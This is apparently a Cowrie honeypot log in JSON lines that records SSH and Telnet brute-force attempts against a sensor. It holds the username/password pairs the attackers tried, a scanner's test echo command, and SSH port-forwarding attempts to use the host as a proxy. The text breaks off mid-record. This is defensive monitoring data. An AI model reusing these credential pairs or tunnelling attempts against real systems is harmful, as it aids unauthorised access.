{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:30.897171Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":39898,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dfbf3d2e99f","protocol":"ssh","message":"New connection: 103.12.154.87:39898 (1.2.3.4:22) [session: 1dfbf3d2e99f]","sensor":"my-vps","timestamp":"2025-08-26T07:14:32.137949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:14:32.139549Z","src_ip":"103.12.154.87","session":"1dfbf3d2e99f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:14:32.375085Z","src_ip":"103.12.154.87","session":"1dfbf3d2e99f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:14:33.342376Z","src_ip":"103.12.154.87","session":"1dfbf3d2e99f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:34.576771Z","src_ip":"103.12.154.87","session":"1dfbf3d2e99f"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":41036,"dst_ip":"1.2.3.4","dst_port":22,"session":"47e0af6fb341","protocol":"ssh","message":"New connection: 103.12.154.87:41036 (1.2.3.4:22) [session: 47e0af6fb341]","sensor":"my-vps","timestamp":"2025-08-26T07:14:34.798135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:14:34.799371Z","src_ip":"103.12.154.87","session":"47e0af6fb341"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:14:35.022488Z","src_ip":"103.12.154.87","session":"47e0af6fb341"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:14:35.962252Z","src_ip":"103.12.154.87","session":"47e0af6fb341"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:36.186964Z","src_ip":"103.12.154.87","session":"8dab50dfda13"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:36.189520Z","src_ip":"103.12.154.87","session":"47e0af6fb341"}
{"eventid":"cowrie.session.connect","src_ip":"164.92.181.33","src_port":43174,"dst_ip":"1.2.3.4","dst_port":23,"session":"24f8115504a9","protocol":"telnet","message":"New connection: 164.92.181.33:43174 (1.2.3.4:23) [session: 24f8115504a9]","sensor":"my-vps","timestamp":"2025-08-26T07:14:39.486786Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T07:14:39.620757Z","src_ip":"164.92.181.33","session":"24f8115504a9"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T07:14:40.705497Z","src_ip":"164.92.181.33","session":"24f8115504a9"}
{"eventid":"cowrie.session.closed","duration":2.9906973838806152,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:42.477412Z","src_ip":"164.92.181.33","session":"24f8115504a9"}
{"eventid":"cowrie.session.connect","src_ip":"164.92.181.33","src_port":43190,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8942f0f3581","protocol":"telnet","message":"New connection: 164.92.181.33:43190 (1.2.3.4:23) [session: e8942f0f3581]","sensor":"my-vps","timestamp":"2025-08-26T07:14:42.487498Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:14:42.616569Z","src_ip":"164.92.181.33","session":"e8942f0f3581"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:14:42.640735Z","src_ip":"164.92.181.33","session":"e8942f0f3581"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T07:14:42.722872Z","src_ip":"164.92.181.33","session":"e8942f0f3581"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":34692,"dst_ip":"1.2.3.4","dst_port":22,"session":"943e7dc07cb0","protocol":"ssh","message":"New connection: 139.19.117.131:34692 (1.2.3.4:22) [session: 943e7dc07cb0]","sensor":"my-vps","timestamp":"2025-08-26T07:14:43.173822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:14:43.174777Z","src_ip":"139.19.117.131","session":"943e7dc07cb0"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T07:14:43.192482Z","src_ip":"139.19.117.131","session":"943e7dc07cb0"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"32:bd:05:81:a4:b9:f6:db:02:f1:ec:90:3a:b6:f9:93","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo2BYNo7XwDuIFJ3QhJyc6bxiDzi64jbpYNu/rCYfjgqXgwubI599wciCpVFyPGbzpMDsKVP31ChUEt2jv1FGcJZwZKI7fPlupuhJMkxY8yc8mqQrmLVlsYruZVgleNLoBvOIp7F478g0lwnKW568/5zU/6uQ9A1J5xW1l1Bw371r4ThphzcP2DJmnrqdbz1PS6/ZQ38qcoxNVB7hHca0miIJWMmYpAajXJBz7r35nvj957zA583oZgO7gWvoYf/LAj4ws7Td+KukILUoEKuD8YlA+qyoqL/7D+K2mAU0ccnrL3yq3hHQBpDkadzAyykmM/ih6veu6tnQEnKkVRpWn","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 32:bd:05:81:a4:b9:f6:db:02:f1:ec:90:3a:b6:f9:93","sensor":"my-vps","timestamp":"2025-08-26T07:14:43.230810Z","src_ip":"139.19.117.131","session":"943e7dc07cb0"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"32:bd:05:81:a4:b9:f6:db:02:f1:ec:90:3a:b6:f9:93","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo2BYNo7XwDuIFJ3QhJyc6bxiDzi64jbpYNu/rCYfjgqXgwubI599wciCpVFyPGbzpMDsKVP31ChUEt2jv1FGcJZwZKI7fPlupuhJMkxY8yc8mqQrmLVlsYruZVgleNLoBvOIp7F478g0lwnKW568/5zU/6uQ9A1J5xW1l1Bw371r4ThphzcP2DJmnrqdbz1PS6/ZQ38qcoxNVB7hHca0miIJWMmYpAajXJBz7r35nvj957zA583oZgO7gWvoYf/LAj4ws7Td+KukILUoEKuD8YlA+qyoqL/7D+K2mAU0ccnrL3yq3hHQBpDkadzAyykmM/ih6veu6tnQEnKkVRpWn","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T07:14:43.231408Z","src_ip":"139.19.117.131","session":"943e7dc07cb0"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"32:bd:05:81:a4:b9:f6:db:02:f1:ec:90:3a:b6:f9:93","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo2BYNo7XwDuIFJ3QhJyc6bxiDzi64jbpYNu/rCYfjgqXgwubI599wciCpVFyPGbzpMDsKVP31ChUEt2jv1FGcJZwZKI7fPlupuhJMkxY8yc8mqQrmLVlsYruZVgleNLoBvOIp7F478g0lwnKW568/5zU/6uQ9A1J5xW1l1Bw371r4ThphzcP2DJmnrqdbz1PS6/ZQ38qcoxNVB7hHca0miIJWMmYpAajXJBz7r35nvj957zA583oZgO7gWvoYf/LAj4ws7Td+KukILUoEKuD8YlA+qyoqL/7D+K2mAU0ccnrL3yq3hHQBpDkadzAyykmM/ih6veu6tnQEnKkVRpWn","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 32:bd:05:81:a4:b9:f6:db:02:f1:ec:90:3a:b6:f9:93","sensor":"my-vps","timestamp":"2025-08-26T07:14:43.250037Z","src_ip":"139.19.117.131","session":"943e7dc07cb0"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"32:bd:05:81:a4:b9:f6:db:02:f1:ec:90:3a:b6:f9:93","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo2BYNo7XwDuIFJ3QhJyc6bxiDzi64jbpYNu/rCYfjgqXgwubI599wciCpVFyPGbzpMDsKVP31ChUEt2jv1FGcJZwZKI7fPlupuhJMkxY8yc8mqQrmLVlsYruZVgleNLoBvOIp7F478g0lwnKW568/5zU/6uQ9A1J5xW1l1Bw371r4ThphzcP2DJmnrqdbz1PS6/ZQ38qcoxNVB7hHca0miIJWMmYpAajXJBz7r35nvj957zA583oZgO7gWvoYf/LAj4ws7Td+KukILUoEKuD8YlA+qyoqL/7D+K2mAU0ccnrL3yq3hHQBpDkadzAyykmM/ih6veu6tnQEnKkVRpWn","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T07:14:43.250595Z","src_ip":"139.19.117.131","session":"943e7dc07cb0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:43.735776Z","src_ip":"164.92.181.33","session":"e8942f0f3581"}
{"eventid":"cowrie.session.closed","duration":1.2534868717193604,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:43.740930Z","src_ip":"164.92.181.33","session":"e8942f0f3581"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:14:53.174006Z","src_ip":"139.19.117.131","session":"943e7dc07cb0"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":36266,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d1b69f0f771","protocol":"ssh","message":"New connection: 103.12.154.87:36266 (1.2.3.4:22) [session: 1d1b69f0f771]","sensor":"my-vps","timestamp":"2025-08-26T07:15:44.138634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:15:44.140763Z","src_ip":"103.12.154.87","session":"1d1b69f0f771"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:15:44.363602Z","src_ip":"103.12.154.87","session":"1d1b69f0f771"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"1234","message":"login attempt [teamspeak/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T07:15:45.869555Z","src_ip":"103.12.154.87","session":"1d1b69f0f771"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:15:47.093181Z","src_ip":"103.12.154.87","session":"1d1b69f0f771"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":34328,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4e8d5ee1d77","protocol":"ssh","message":"New connection: 103.12.154.87:34328 (1.2.3.4:22) [session: a4e8d5ee1d77]","sensor":"my-vps","timestamp":"2025-08-26T07:17:00.800521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:17:00.802727Z","src_ip":"103.12.154.87","session":"a4e8d5ee1d77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:17:01.039167Z","src_ip":"103.12.154.87","session":"a4e8d5ee1d77"}
{"eventid":"cowrie.login.failed","username":"omar","password":"123456","message":"login attempt [omar/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T07:17:02.021892Z","src_ip":"103.12.154.87","session":"a4e8d5ee1d77"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:17:03.266922Z","src_ip":"103.12.154.87","session":"a4e8d5ee1d77"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32217,"dst_ip":"1.2.3.4","dst_port":22,"session":"73daf8c64581","protocol":"ssh","message":"New connection: 213.209.150.239:32217 (1.2.3.4:22) [session: 73daf8c64581]","sensor":"my-vps","timestamp":"2025-08-26T07:17:28.889863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:17:28.890557Z","src_ip":"213.209.150.239","session":"73daf8c64581"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T07:17:28.947350Z","src_ip":"213.209.150.239","session":"73daf8c64581"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:17:29.230531Z","src_ip":"213.209.150.239","session":"73daf8c64581"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":27750,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:27750","sensor":"my-vps","timestamp":"2025-08-26T07:17:29.288342Z","session":"73daf8c64581"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T07:17:29.345146Z","src_ip":"213.209.150.239","session":"73daf8c64581"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":29038,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:29038","sensor":"my-vps","timestamp":"2025-08-26T07:17:29.499146Z","session":"73daf8c64581"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T07:17:29.555740Z","src_ip":"213.209.150.239","session":"73daf8c64581"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:17:29.613436Z","src_ip":"213.209.150.239","session":"73daf8c64581"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":60620,"dst_ip":"1.2.3.4","dst_port":22,"session":"b574eb345e90","protocol":"ssh","message":"New connection: 103.12.154.87:60620 (1.2.3.4:22) [session: b574eb345e90]","sensor":"my-vps","timestamp":"2025-08-26T07:18:15.871646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:18:15.874316Z","src_ip":"103.12.154.87","session":"b574eb345e90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-n